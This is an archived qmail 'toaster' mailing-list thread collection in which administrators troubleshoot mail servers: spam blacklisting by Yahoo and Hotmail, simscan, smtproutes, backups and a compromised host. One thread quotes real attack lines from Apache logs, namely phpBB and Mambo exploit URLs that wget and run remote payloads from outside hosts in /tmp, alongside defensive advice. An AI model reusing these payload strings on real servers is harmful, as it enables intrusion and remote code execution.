Re: [toaster] Toaster compromised? Or system?
Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700: wget ftp lynx If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl filename.pl Check out mod_security for Apache as well. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 324980 Feb08 ?S0:00\_ perl /tmp/dc.txt 67.159.2 apache 32503 324990 Feb08 ?S0:00\_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick !DSPAM:43ec99dc204751732444004!Thanks Rick,I'm running php 4.3.10 and I can't find any information about a xmlrpcexploit; I also can't find any entries in my logs about dc.txt. I willkeep looking.Thanks,David.
Re: [toaster] Toaster compromised? Or system?
I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable.I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version.I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore.I just run security updates daily instead on all packages.Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF.This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit.But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092!Cheers Bill, register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-sitesettingDavid
Re: [toaster] Qmail - how to backup all mails?
Hi KS, This should work... From your shell prompt: vpopmailctl stop qmailctl stop mkdir /var/src/qmail_backup cp /home/vpopmail/domains/ /var/src/qmail_backup/ -R Should grab all of the e-mails, as they are stored in: /home/vpopmail/domains/ Good luck! Peter On Tue, 07 Dec 2004 18:22:33 +0100, Krzysztof Syguda [EMAIL PROTECTED] wrote: Does somebody know how to backup all incoming and outgoing mail for domain (or toaster server) or CC of all incoming and outgoing mail to one address? KS /\ /// / Krzysztof Syguda \\\ \ tel. +48 607223304 / e-mail: [EMAIL PROTECTED] Thought for the day: The only thing that hurts more than paying income tax is not having to pay income tax.
Re: [toaster] Yahoo Domain Keys
Boris, I did notice that, and I was contemplating not even posting the link on this list, as I for one absolutely hate how Yahoo insists on running their abuse and postmaster departments. However, as an ISP we need to deal with the way(terrible) Yahoo is dealing with tagging messages as SPAM. Thanks, Peter On Thu, 18 Nov 2004 11:13:08 +0200, Boris Pavlov [EMAIL PROTECTED] wrote: Peter Maag wrote: To Bill and the List, I wanted to bring everyone's attention to Yahoo's new version of stopping SPAM, domainkeys(http://antispam.yahoo.com/domainkeys). Basically it is their version of maybe this is (a part of) the reason http://domainkeys.sourceforge.net/license/patentlicense1-0.html any lawyer to check it out? at first glance it is a just some protective measure against a patent infringement claim against any Implementation (3.1). SPF (why they don't just use SPF is beyond me), and there is a qmail patch available: http://qmail.org/qmail-1.03-dk-0.53.patch Will this patch work with the toaster, or do we need to roll something else? Thanks! Peter
Re: [toaster] simscan
spud, Thanks for looking into this a little moreIt sounds like an awesome replacement to qmailscanner, and will certainly limit the queue filling up from bounces to invalid domains, etc. Peter a.h.s. boy (lists) wrote: On Sep 29, 2004, at 7:24 PM, Bill Shupp wrote: a.h.s. boy (lists) wrote: So it sounds like you can just set the simscan rejection level very high, like 30, and it will only reject the mail over that threshold. If SpamAssassin's own threshold setting can be different (like 7), then SA will still mark the mail as Spam, and simscan will allow it to pass through. That's how I read it. I plan to test simscan soon. Right now it's failing, and strace is not helping, but I have not tested it much yet. I'll report back when I have. I got a response from Ken Jones. Sounds like we have it right: With spamassassin enabled --enable-spam the email is passed through spamassassin with all it's associated headers. If the email is marked as spam then it is rejected. All other emails pass through with the spamassassin headers intact. With --enable-spam-hits=number then only email above this hit count is rejected. All other email is passed through including email marked as spam. The idea was to only reject really bad spam and let the user filter the rest. Cheers, spud. --- a.h.s. boy spud(at)nothingness.orgas yes is to if,love is to yes http://www.nothingness.org/ ---
Re: [toaster] simscan
Bill and Tom, Thanks for the replies. I don't think I was very clear in my first message. I would like ClamAV to scan and block at the SMTP level, but have SpamAssassin run as it normally does with QmailScanner, after the message has already been accepted. From briefly looking over simscan, it looks like it does support SpamAssassin based filtering, however it will only work at the SMTP level and will block messages that reach the score threshold. Am I stuck with using simscan and qmailscanner? Thanks, Peter Bill Shupp wrote: Peter Maag wrote: Jason, It looks good to us, however we don't want to reject based on SpamAssassin results. Right now we use qmailscanner, which does slow things down quite a bit and a C alternative that does a SMTP deny based on ClamAV, and not SpamAssassin would be preferred. Anyone know of a solution that would work? Thanks, Peter Peter, This will do exactly that. SpamAssassin blocking is optional. There's also qscanq: www.qscanq.org. But it's a bit more complicated to get working correctly, and I've had problems with it on FreeBSD. Also, qscanq does NOT do attachment blocking. If you require SpamAssassin scanning at the smtp level, you should look into qmail-spamc, which is a simple C program to call first spamc, then qmail-queue. You could manually add this to your chan AFTER simscan, either editing the qmail-queue call from simscan manually, or using symlinks. Regards, Bill
Re: [toaster] stunnel and redhat enterprise 3.0
Jason, We have had the same problem with a Redhat 9 machine of ours. We have just kept stunnel at 3.x , would also like to know how to get things operational with stunnel 4.x Peter Jason 'XenoPhage' Frisvold wrote: Hi all, I just determined that pop3ds is not working at all here... Apparently the script calls several parameters for stunnel that are no longer available in stunnel? I have the stock pop3ds run file from the toaster which assumes stunnel 3.x ... I'm running stunnel 4.x ... Anyone know how to set this up for stunnel 4.x ??
Re: [toaster] not sending
Noel, Try doing a: cat /var/log/qmail/smtpd/current and cat /var/log/qmail/current These are the log files associated with most qmail deliveries and are usually quite helpful in letting you know exactly what is going on. Hope this helps, Peter Noel Sanchez wrote: I setup a new toaster and don't know why I can't send emails from Outlook. When I do qmailctl I get following: [EMAIL PROTECTED] root]# qmailctl stat /service/qmail-send: up (pid 1723) 762 seconds /service/qmail-send/log: up (pid 1725) 762 seconds /service/qmail-smtpd: up (pid 1719) 762 seconds /service/qmail-smtpd/log: up (pid 1731) 762 seconds messages in queue: 8130 messages in queue but not yet preprocessed: 0 Also, when I do a ps -aux I see many emails waiting to be sent but aren't being sent. Any ideas? qmailr6029 0.0 0.3 4412 836 ?S12:12 0:00 qmail-remote yam.com.tw [EMAIL PROTECTED] qmailr6078 0.0 0.3 4472 840 ?S12:12 0:00 qmail-remote mks.com.tw [EMAIL PROTECTED] qmailr6188 0.0 0.3 4796 836 ?S12:12 0:00 qmail-remote newcomm.net ohv0q.rbdq qmailr6204 0.0 0.3 5028 840 ?S12:12 0:00 qmail-remote ms10.hinet.net [EMAIL PROTECTED] qmailr6217 0.0 0.3 4604 848 ?S12:13 0:00 qmail-remote yam.com.tw [EMAIL PROTECTED] qmailr6229 0.0 0.3 5184 840 ?S12:13 0:00 qmail-remote yahoo.com.tw 6uimecdrk qmailr6231 0.0 0.3 4212 844 ?S12:13 0:00 qmail-remote yahoo.com.tw 6uimecdrk qmailr6236 0.0 0.3 4040 836 ?S12:13 0:00 qmail-remote tke.tsannkuen.com 6uim qmailr6238 0.0 0.3 4772 840 ?S12:13 0:00 qmail-remote hjinn.com.tw 6uimecdrk
Re: [toaster] not sending
Noel, What are the IP's of the mail server? I would shut down the port 25 forward to see if that slows things down. Make sure you followed the toaster install instructions correctly, as you may have forgotten to stop the server functioning as an open relay. Thanks, Peter Noel Sanchez wrote: I don't understand, I looked at those 2 log files and this is a portion of it, The messages in the queue keep increasing fast. It seems like this mail server is being used for spam? This is a new toaster on Fedora core2 behind a linux firewall with ports 80, 25, and 110 being forwarded to the mail server. Could it be a computer thats infected with something? The mail that is being sent is not coming from here, no one is sending out that stuff... @4000415b44b03aea448c tcpserver: status: 12/20 @4000415b44b03aea6b9c tcpserver: pid 6893 from 192.168.2.1 @4000415b44b03aea830c tcpserver: ok 6893 0:192.168.2.100:25 :192.168.2.1::27193 @4000415b44b1003fc244 tcpserver: end 6879 status 0 @4000415b44b1003ff124 tcpserver: status: 11/20 @4000415b44b10f5f2864 tcpserver: status: 12/20 @4000415b44b10f69cb0c tcpserver: pid 6896 from 192.168.2.1 @4000415b44b10f6e0ce4 tcpserver: ok 6896 0:192.168.2.100:25 :192.168.2.1::27195 @4000415b44b302a1b6b4 tcpserver: end 6893 status 0 @4000415b44b302a1d9dc tcpserver: status: 11/20 @4000415b44b3130ef1c4 tcpserver: status: 12/20 @4000415b44b3130f18d4 tcpserver: pid 6907 from 192.168.2.1 @4000415b44b3130f3044 tcpserver: ok 6907 0:192.168.2.100:25 :192.168.2.1::27196 @4000415b44b31a093304 tcpserver: end 6896 status 0 @4000415b44b31a09562c tcpserver: status: 11/20 @4000415b44b52065d89c tcpserver: end 6907 status 0 @4000415b44b52065ffac tcpserver: status: 10/20 @4000415b44b5226e6a3c tcpserver: end 6876 status 0 @4000415b44b5226e897c tcpserver: status: 9/20 @4000415b44b52f3f6bbc tcpserver: status: 10/20 @4000415b44b52f3f96b4 tcpserver: pid 6924 from 192.168.2.1 @4000415b44b52f3fae24 tcpserver: ok 6924 0:192.168.2.100:25 :192.168.2.1::27197 @4000415b44b52f3fc97c tcpserver: status: 11/20 @4000415b44b52f3fdd04 tcpserver: pid 6925 from 192.168.2.1 @4000415b44b52f3ff08c tcpserver: ok 6925 0:192.168.2.100:25 :192.168.2.1::27198 @4000415b44b6352aec7c tcpserver: status: 12/20 @4000415b44b6352b1774 tcpserver: pid 6930 from 192.168.2.1 @4000415b44b6352b2ee4 tcpserver: ok 6930 0:192.168.2.100:25 :192.168.2.1::27199 @4000415b44b71dbc5bac tcpserver: end 6925 status 0 @4000415b44b71dbc86a4 tcpserver: status: 11/20 @4000415b44b730521824 tcpserver: status: 12/20 @4000415b44b73052431c tcpserver: pid 6943 from 192.168.2.1 @4000415b44b730525a8c tcpserver: ok 6943 0:192.168.2.100:25 :192.168.2.1::27200 and the other log file: @4000415b44ec0044affc info msg 349855: bytes 2556 from [EMAIL PROTECTED] qp 7251 uid 89 @4000415b44ec0db0bce4 delivery : success: 168.95.5.5_accepted_message./Remote_host_said:_250_HAA26438_Message_accepted_for_delivery/ @4000415b44ec0db0efac status: local 0/10 remote 19/20 @4000415b44ec0db1071c end msg 347963 @4000415b44ec0dbd76b4 starting delivery 1116: msg 346923 to remote [EMAIL PROTECTED] @4000415b44ec0dbd99dc status: local 0/10 remote 20/20 @4000415b44ec0ebe21bc new msg 349862 @4000415b44ec0ebe4cb4 info msg 349862: bytes 3728 from [EMAIL PROTECTED] qp 7253 uid 89 @4000415b44ed10c8499c new msg 346929 @4000415b44ed10c87494 info msg 346929: bytes 7234 from [EMAIL PROTECTED] qp 7258 uid 89 @4000415b44ed391e853c delivery 1114: success: 168.95.5.36_accepted_message./Remote_host_said:_250_HAA27941_Message_accepted_for_delivery/ @4000415b44ed391ebfd4 status: local 0/10 remote 19/20 @4000415b44ed391ed744 starting delivery 1117: msg 346923 to remote [EMAIL PROTECTED] @4000415b44ed391ef29c status: local 0/10 remote 20/20 @4000415b44ed391f0624 end msg 347956 @4000415b44ed3af51614 new msg 349863 @4000415b44ed3af5410c info msg 349863: bytes 7229 from [EMAIL PROTECTED] qp 7260 uid 89 @4000415b44ee1363e7c4 delivery 1110: success: 168.95.5.23_accepted_message./Remote_host_said:_250_HAA23411_Message_accepted_for_delivery/ @4000415b44ee13641a8c status: local 0/10 remote 19/20 @4000415b44ee13642e14 starting delivery 1118: msg 346923 to remote [EMAIL PROTECTED] @4000415b44ee1364496c status: local 0/10 remote 20/20 @4000415b44ee136460dc end msg 347955 @4000415b44ee2258231c delivery 1106: success: 211.23.16.93_accepted_message./Remote_host_said:_250_mail_received,_ready_to_proceed./ @4000415b44ee22585db4 status: local 0/10 remote 19/20 @4000415b44ee22587524 starting delivery 1119: msg 346923 to remote [EMAIL PROTECTED] @4000415b44ee2258907c status: local 0/10 remote 20/20 Noel, Try doing a: cat /var/log/qmail/smtpd/current and cat /var/log/qmail/current These are the log files associated with most qmail deliveries and are usually quite helpful in
Re: [toaster] Hotmail is recieving mail in junk box
Saki, Looks like you may have gotten a bad ip block from your provider. You can run a test on your IP by going to: http://www.dnsstuff.com . There is a box at the very top, middle column that says: Spam Database Lookup . Put your IP in there and run the test, it will show you which Blacklists currently have you listed. Hopefully you arn't the one sending SPAM, and you can somehow convince them to unblacklist you. Good luck, Peter saki wrote: Peter, Thank you for your reply. As like hotmail this problem is arising when user send mail to gawab.com Qmail reply it : @4000414ebf192faaacc4 new msg 97866 @4000414ebf192faac81c info msg 97866: bytes 907 from [EMAIL PROTECTED] qp 2470 uid 89 @4000414ebf19306722dc starting delivery 13: msg 97866 to remote [EMAIL PROTECTED] @4000414ebf1930695d2c status: local 0/10 remote 1/20 @4000414ebf2032f2b3a4 delivery 13: deferral: Connected_to_204.97.230.38_but_greeting_failed./Remote_host_said:_558_Your_network_address_is_blacklisted,_this_means_that_your_network_range_or_your_server_is_in_our_blacklist._If_you_think_you_were_added_by_mistake,[EMAIL PROTECTED],_please_make_sure_your_outgoing_server_is_smtp.gawab.com_(#5.7.1)/ @4000414ebf2032f3348c status: local 0/10 remote 0/20 So I think there is certain clue between hotmail and gawab.com With best wishes Saki --- Peter Maag [EMAIL PROTECTED] wrote: Saki, Yes, quite frustrating isn't it? As Bill mentioned we were having a similar problem with Yahoo! recently, and are less than impressed with their postmaster department. Yahoo! has a form buried deep in their site that they will send you to fill out if you are being blacklisted. Filled it out, and never got a response so we were finally forced to change the IPs of our SMTP servers. No good. The cause of the problem was the story I posted in the link that Bill provided. Our users had setup forwards from the domain we were hosting to their Yahoo! accounts. SPAM would come through hit our servers, our servers would send it on it's way, and our users would mark it as SPAM in their Yahoo! inbox. Yahoo! started noticing quite a few SPAM complaints because of this, and started to blacklist us. Not much you can do about that, except setup SPF and pray. I would URGE everyone here who has a fair amount of users to signup with AOL's Postmaster department on their whitelist service. http://postmaster.aol.com , heck even give them a call and they will get everything setup for you! It is a pleasant departure from the bad rep AOL has always received. As for Hotmail, after looking through their website it appears as if they have a phone number dedicated to these types of problems: 1-650-964-7200 , which was found on the very very bottom of this page: http://www.hotmail.msn.com/cgi-bin/dasp/ua_info.asp?_lang=ENcountry=US Good luck! Peter Bill Shupp wrote: saki wrote: --- saki [EMAIL PROTECTED] wrote: Hello all, I have installed qmail successfuly according to BILL's guide. My server send mail to yahoo and gmail successfuly. But when i send message qmail reply me [EMAIL PROTECTED] root]# tail -f /var/log/qmail/current @4000414d9f4612105614 new msg 97975 @4000414d9f461210716c info msg 97975: bytes 231 from [EMAIL PROTECTED] qp 2370 uid 0 @4000414d9f46125ca154 starting delivery 2: msg 97975 to remote [EMAIL PROTECTED] @4000414d9f46125cb8c4 status: local 0/10 remote 2/20 @4000414d9f4f1e33e53c delivery 2: success: 65.54.190.7_accepted_message./Remote_host_said:_250__[EMAIL PROTECTED]_Queued_mail_for_delivery/ and hotmail catch the mail in junk box. Why it's going on ? any one could help me? Check out this thread on a similar situation with Yahoo: http://mail-archive.com/[EMAIL PROTECTED]/msg01730.html Regards, Bill __ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail
Re: [toaster] cgi-bin
Nezinu, You most likely have incorrect permissions set on the qmailadmin cgi file, or your Apache installation does not include support for cgi related programs. You will need to setup your cgi-bin as your ScriptAlias directory in your httpd.conf . Check http://www.apache.org for details on setting that directive up, and other CGI related problems. Hope this helps, Peter Nezinu wrote: Hello. I read your instructions how to make a mailserver and all did fine, only at the end of document something went wrong. The problem is that when i open http://myhost.lv/cgi-bin/qmailadmin it says me to save or open this file and not open same page. Or trying to change some configs i get simply page not found.. Please help me..
Re: [toaster] Forwarding and SPAM Question
Eero, Thanks for the tip. Are there any smarthosts that one can pay for to send mail to Yahoo? How does one selectively route e-mail out of qmail to alternate smtp servers? Thanks, Peter Eero Volotinen wrote: Peter Maag kirjoitti: Bill and everyone else, I finally managed to get around Yahoo! filtering all e-mail from our SMTP IP address for the time being. Here is what I feel is happening, and really don't know if there is a solution: Use smarthost to relay mail to yahoo. -- Eero
Re: [toaster] Yahoo Filtering and SMTP Routes
Bill, About to do this switchover as you described. I looked through the QMail docs and can't tell if putting the smtproutes information in the server will stop mail from being delivered locally. For instance, the server that is being filtered by Yahoo is also the primary MX for the related domains. So for instance, say [EMAIL PROTECTED] receives an e-mail to this blocked SMTP server. Since the config has been placed in the smtproute file wouldn't that message be forwarded on to my temporary external SMTP server? I hope this is clear. Thanks for the help, Peter Peter Maag wrote: Bill, It seems that they have not implemented SPF as of yet, because we have SPF records on all of our domains. I will try the solution you posted and will get back to you guys. It seems that Yahoo does not have ANY contact information with their postmaster department, as customer care has no clue what an SMTP server even is! Peter Bill Shupp wrote: Peter Maag wrote: Hey All, Recently for some reason our customers have been complaining that mail forwarded or sent to their Yahoo accounts is being automatically deposited into their Bulk Mail folders. Contacting Yahoo! has been an uphill battle, and after numerous phone calls and e-mails to try and get to talk to someone with a clue we are giving up on them. Each of our SMTP servers has reverse DNS enabled and functioning correctly. We are on clean IPs, and none of the IPs are listed in any RBL or Blacklist. Have they implemented SPF? http://spf.pobox.com/faq.html#forwarding I would like to leave our current SMTP servers intact and simply have them forward any mail they receive from our clients to yet another SMTP server that we operate on an entirely separate network. This would only be temporary until we get Yahoo to actually tell us what is going on. How would you accomplish this with qmail? put: :ipoftempsmtpserver in /var/qmail/control/smtproutes and hup qmail-send (replacing ipoftempsmtpserver with the actual IP). And make sure that the new smtp server has your current smtp server setup as RELAYCLIENT. Regards, Bill
[toaster] Forwarding and SPAM Question
Bill and everyone else, I finally managed to get around Yahoo! filtering all e-mail from our SMTP IP address for the time being. Here is what I feel is happening, and really don't know if there is a solution: Users with their own domain names use our e-mail services to forward messages to their Yahoo! and AOL accounts. Lets say Jim has the domain: jimsdomain.com hosted with us. Jim decides that the Yahoo! account he has is the best thing sliced bread, and figures that he should just have all e-mail from jimsdomain.com forwarded to his Yahoo! account. Not a problem! He logs into qmailadmin, sets up the forward and everything is merry! Not so fast, Jim has had jimsdomain.com since the advent of DNS and his e-mail address has made it's rounds on spam lists, etc, etc, so Jim gets quite a large amount of SPAM on a daily basis. This SPAM hits our SMTP server, gets forwarded to Yahoo and placed in Jim's INBOX just like it should. Jim takes one look at: [EMAIL PROTECTED]@x CHeaPEr oNLINE and instantly flags it as SPAM in his Yahoo account. He does this with every spam e-mail he receives, and pretty soon Yahoo! takes a look at the headers and realizes that our SMTP servers are responsible for sending quite a bit of SPAM to Jim. Our servers get blocked, and Jim instantly complains that his Aunt Janice's really important e-mail got moved to his Bulk folder and he missed some important correspondence. Natuarally, you can see the problem here. We are getting our IP ranges marked in providers blacklists due to e-mail forwarding that we are doing on behalf of our customers. Is there anyway around this besides calling each customer and educating them about what they are doing? AOL has a great program with their SPF implementation, feedback loop, and whitelisting. I never thought I would say this, but AOL's postmaster department has a great website, and even greater postmaster customer service reps. Yahoo's is a nightmare and I have a feeling the people that can unblock an IP range sit locked away somewhere with no lines to the outside. As a provider this is extremely frustrating, as we constantly have to tread lightly with Yahoo! Any ideas/suggestions are greatly appreciated. Peter
Re: [toaster] Yahoo Filtering and SMTP Routes
Bill, It seems that they have not implemented SPF as of yet, because we have SPF records on all of our domains. I will try the solution you posted and will get back to you guys. It seems that Yahoo does not have ANY contact information with their postmaster department, as customer care has no clue what an SMTP server even is! Peter Bill Shupp wrote: Peter Maag wrote: Hey All, Recently for some reason our customers have been complaining that mail forwarded or sent to their Yahoo accounts is being automatically deposited into their Bulk Mail folders. Contacting Yahoo! has been an uphill battle, and after numerous phone calls and e-mails to try and get to talk to someone with a clue we are giving up on them. Each of our SMTP servers has reverse DNS enabled and functioning correctly. We are on clean IPs, and none of the IPs are listed in any RBL or Blacklist. Have they implemented SPF? http://spf.pobox.com/faq.html#forwarding I would like to leave our current SMTP servers intact and simply have them forward any mail they receive from our clients to yet another SMTP server that we operate on an entirely separate network. This would only be temporary until we get Yahoo to actually tell us what is going on. How would you accomplish this with qmail? put: :ipoftempsmtpserver in /var/qmail/control/smtproutes and hup qmail-send (replacing ipoftempsmtpserver with the actual IP). And make sure that the new smtp server has your current smtp server setup as RELAYCLIENT. Regards, Bill
Re: [toaster] Suggestions for improving performance
Darrell, I wasn't that specific in my original post, and for that I apologize. Our setup is configured like I mentioned, except for the fact that our primary mail server(the one with the vpopmail accounts) is configured as a backup MX in our DNS zones. This way if our primary scanner goes down mail is still delivered correctly. However, having our primary mail server as a secondary MX in DNS opened up a few other problems...It seems that a lot of viruses and bulk mailer programs are written to deliver their nasty mail to all MX records for a domain, or simply deliver the mail to the backup MX servers. It looks like they realized what we are trying to do, get the scanning off of our primary mail server and onto a dumb machine that simply scans e-mails all day. The solution is pretty elegant really, but is not entirely scalable. With help from Bill, we figured out how to scan messages selectively based on where they were coming from. Any messages being sent from our scanner machine are not scanned by our primary mail server, as, obviously they have been scanned by the scanner machine. Now, if the primary mail server gets a message from somewhere else besides the scanner machine we set QMAILQUEUE to qmailscanner and the message is scanned. We still benefit from improved performance, and do not have problems delivering mail to picky ISP's like AOL. The downside to this system is that we need to keep spamassassin/clamav current on two machines, but we have noticed a good performance increase with this system...As 99% of all legitimate e-mails are sent to the MX record with the highest priority, which is our scanner machine. Hope this helps, Peter Darrell Strong wrote: Peter, I was reading your post from Shupp toaster page (see below) and was wondering how you resolved the aol problem that is associated with having your gateway email server on your mx record and not your true email server. I have my setup just like you mentioned below. It works great but i just realized that AOL is sending all incoming mail we are sending it to the aol users spam folder. Evidently AOL is assuming all incoming mail from my mailserver is spam because it is originating from my mail server which is no longer at my mx record ip address. Therefore there is no reverse dns record for it. Outgoing mail goes out directly out from my mailserver, bypassing the gateway. Did you have this problem? Should I route all outgoing mail back thru the gateway? Any help you could provide would be appreciated. Thanks " Jeff, We had a similar problem, and our bottleneck was SpamAssassin and Clam Scanner. We ended up putting SpamAssassin and Clamd on a seperate machine that simply scanned the incoming messages and passed them onto the primary mail machine that housed the vpopmail accounts, etc. All you need to do is install Bill's toaster on a second machine with Qmailscanner, SpamAssassin, etc, etc. and then setup that machine to forward all mail to your primary box in /var/qmail/control/smtproutes Works like a charm, just make sure DNS points to the scanning server in the MX route. Peter" Darrell Strong Technology Coordinator Haddon Heights Public Schools (856) 547-0521
Re: [toaster] Suggestions for improving performance
Darrell, Honestly I am not sure how you would go about sending e-mails through your scanning machine.Hopefully someone else from the list will respond with the answer. Peter [EMAIL PROTECTED] wrote: Peter, thanks for getting back to me so quickly. I may need to reroute outgoing AOL mail thru the gateway email server. I attempted this yesterday by creating an smtproutes file and adding "aol.com:my.gtw.ip.addr" . The gateway sent me a message back telling me that: Remote host said: 553 sorry, that domain isn't in my list of allowed rcpthosts; no valid cert for gatewaying (#5.7.1) I guess I need to refigure out how to tell the gateway to send msgs from aol on to their destination, which isn't on that machine. Do you know a simple way to do that from the gateway? Do I need to edit the rcpthosts file? This would seem to be opening a can of worms but I'm not sure. Any help would be appreciated. Thanks Darrell Strong Darrell, I wasn't that specific in my original post, and for that I apologize. Our setup is configured like I mentioned, except for the fact that our primary mail server(the one with the vpopmail accounts) is configured as a backup MX in our DNS zones. This way if our primary scanner goes down mail is still delivered correctly. However, having our primary mail server as a secondary MX in DNS opened up a few other problems...It seems that a lot of viruses and bulk mailer programs are written to deliver their nasty mail to all MX records for a domain, or simply deliver the mail to the backup MX servers. It looks like they realized what we are trying to do, get the scanning off of our primary mail server and onto a dumb machine that simply scans e-mails all day. The solution is pretty elegant really, but is not entirely scalable. With help from Bill, we figured out how to scan messages selectively based on where they were coming from. Any messages being sent from our scanner machine are not scanned by our primary mail server, as, obviously they have been scanned by the scanner machine. Now, if the primary mail server gets a message from somewhere else besides the scanner machine we set QMAILQUEUE to qmailscanner and the message is scanned. We still benefit from improved performance, and do not have problems delivering mail to picky ISP's like AOL. The downside to this system is that we need to keep spamassassin/clamav current on two machines, but we have noticed a good performance increase with this system...As 99% of all legitimate e-mails are sent to the MX record with the highest priority, which is our scanner machine. Hope this helps, Peter Darrell Strong wrote: Peter, I was reading your post from Shupp toaster page (see below) and was wondering how you resolved the aol problem that is associated with having your gateway email server on your mx record and not your true email server. I have my setup just like you mentioned below. It works great but i just realized that AOL is sending all incoming mail we are sending it to the aol users spam folder. Evidently AOL is assuming all incoming mail from my mailserver is spam because it is originating from my mail server which is no longer at my mx record ip address. Therefore there is no reverse dns record for it. Outgoing mail goes out directly out from my mailserver, bypassing the gateway. Did you have this problem? Should I route all outgoing mail back thru the gateway? Any help you could provide would be appreciated. Thanks " Jeff, We had a similar problem, and our bottleneck was SpamAssassin and Clam Scanner. We ended up putting SpamAssassin and Clamd on a seperate machine that simply scanned the incoming messages and passed them onto the primary mail machine that housed the vpopmail accounts, etc. All you need to do is install Bill's toaster on a second machine with Qmailscanner, SpamAssassin, etc, etc. and then setup that machine to forward all mail to your primary box in /var/qmail/control/smtproutes Works like a charm, just make sure DNS points to the scanning server in the MX route. Peter" Darrell Strong Technology Coordinator Haddon Heights Public Schools (856) 547-0521 Darrell Strong Technology Coordinator Haddon Heights Public Schools 856-547-0521
[toaster] Multiple Domains Same Users
Hey All, Not sure if there is an elegant solution to this with QMail, but I am curious. Say I have a user john who has the e-mail address: [EMAIL PROTECTED] , john registers another domain, domain2.com and would like all e-mail hitting domain2 to be sent to [EMAIL PROTECTED] . But, if john adds more users to: domain.com he would like them to propogate over to domain2.com without having to do any more configuration. Any ideas? Peter
Re: [toaster] controlling size of attachments
Jeff, That functionality is built into QMail. Edit/Create the file: /var/qmail/control/databytes Enter a value in there in bytes(i.e. my max is 5MB so it reads: 500) Thats it! Peter Jeff Koch wrote: Does anyone know of a patch that would allow the mailserver to reject emails/attachments over a certain size? Best Regards, Jeff Koch
Re: [toaster] Removing Bounced Mail Attachment
Bill, I spent some time researching this a little bit further and found this patch: http://www.qmail.org/qmail-send.mimeheaders.tar.gz Any ideas on how that would affect a toaster installation? Thanks, Peter Bill Shupp wrote: Peter Maag wrote: To The List, We are co-locating our MTA's and have a specific commitment with our colo provider. We are billed on 95%'tile and have been having problems recently with people attempting to send very large attachments to clients on our machines. Recently one user decided it would be a good idea to send a 100MB attachment to a user, the message was bounced using the databytes file in /var/qmail/control. However, I noticed that QMail downloads the message completely, and then bounces it with the attachment. As you can imagine, if multiple users are doing this it tends to raise our bandwidth usage considerably. Do any of you know how to reject an e-mail with a huge attachment, without forwarding the orig. message including the attachment? Thanks for the help, I'm not aware of one. If you find one, let me know and I'll check it out. Regards, Bill
[toaster] Strange SMTP Problem
To The List, I have a new server that is using Bill's 0.5 patch and vpopmail and MySQL.Everything works just great, POP3 authenticates fine, and the username is added to the allowed relay table in the database. I first started noticing problems when I started to try and send mail via the server, after authenticating with POP3. My mail client(Mozilla Thunderbird) seems to pause on Delivering Mail mode. If I don't click cancel, the Delivering Mail window stays up indefinitly. Using netstat on the server shows an open SMTP session from the client, however no new mail is being listed in /var/log/qmail/current ... The message never makes it to the queue. This got me thinking, so I POP'd into the server and then opened up telnet to try and send a message by hand. The server responds as anticipated until I try to exit the data portion of the message with the period(.) command. The server does not end the message there, but continues onto a new line.There is no real way to exit the data portion of the message! Anyone have a problem similar to this one? Thanks, Peter
RE: [toaster] HELP...Toaster only accepting smtp connects from localhost :(
